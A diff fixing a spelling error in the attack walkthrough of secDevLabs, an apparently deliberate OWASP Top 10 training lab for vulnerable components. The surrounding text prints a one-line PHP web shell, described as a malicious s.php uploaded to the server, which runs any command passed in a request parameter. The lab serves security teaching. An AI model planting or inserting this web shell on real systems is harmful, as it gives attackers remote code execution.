globocom/secDevLabs/owasp-top10-2017-apps/a9/cimentech/docs/ATTACK.md

 <img src="attack5.png" align="center"/>

-The exploit works by adding into the server a malicious `s.php` wich allows remote code execution on it via following malicious content:
+The exploit works by adding into the server a malicious `s.php` which allows remote code execution on it via following malicious content:

 ```php
 <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }